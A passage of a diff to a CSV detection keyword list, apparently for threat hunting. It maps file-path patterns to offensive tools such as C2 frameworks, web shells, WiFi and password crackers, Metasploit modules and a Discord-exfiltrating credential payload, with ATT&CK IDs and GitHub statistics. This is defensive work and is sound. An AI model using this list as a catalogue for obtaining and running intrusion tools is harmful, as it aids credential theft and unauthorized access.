T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*/webdav.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/WebDavC2.git*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*/web-hacking-toolkit*","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","2","142","29","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" "*/weblistener.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" @@ -5776,75 +5842,78 @@ "*/webshells/shell.php*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/WebSocketC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/Weevely*","offensive_tool_keyword","weevely","weevely php web shell","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/sunge/Weevely","1","0","N/A","N/A","1","41","113","2012-04-19T18:00:08Z","2012-05-04T13:17:42Z" -"*/Weevely3*","offensive_tool_keyword","Weevely3","Webponized web shell","T1100 - T1102 - T1059 - T1071 - T1056","TA0002 - TA0003","N/A","N/A","Web Attacks","https://github.com/epinna/weevely3","1","0","N/A","N/A","10","2908","607","2023-06-21T14:41:31Z","2014-09-20T10:16:49Z" +"*/Weevely3*","offensive_tool_keyword","Weevely3","Webponized web shell","T1100 - T1102 - T1059 - T1071 - T1056","TA0002 - TA0003","N/A","N/A","Web Attacks","https://github.com/epinna/weevely3","1","0","N/A","N/A","10","2909","606","2023-06-21T14:41:31Z","2014-09-20T10:16:49Z" "*/well_known_sids.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" "*/WerTrigger.git*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" "*/WfpTokenDup.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*/whatlicense.git*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*/WheresMyImplant/*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/WhoAmI.task*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/whoami.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/WhoAmI.task*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/whois-domain.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/whois-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Widgets/LootWidget.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/wifi_hopping.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/Widgets/LootWidget.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/wifi_hopping.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*/WiFiBroot*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" -"*/wifidump.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" -"*/wifite -c *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" -"*/wifite2*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" -"*/wikipedia_fr.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" -"*/wikiZ/RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/wifidump.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/wifite -c *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*/wifite2*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*/wikipedia_fr.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*/wikiZ/RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/win/Tor/tor.exe*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" -"*/Win7ElevateDll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/WinBruteLogon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*/win-brute-logon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*/Win7ElevateDll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/WinBruteLogon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*/win-brute-logon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" "*/windapsearch.git*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" -"*/windapsearch_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/windows/dcerpc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/windows_autologin.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/windapsearch_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/windows/dcerpc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/windows_autologin.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/windows-login-phish*","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","17","5","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" -"*/windows-lpe-template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/windows-lpe-template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*/windows-resources/hyperion*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*/WindowsVault.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 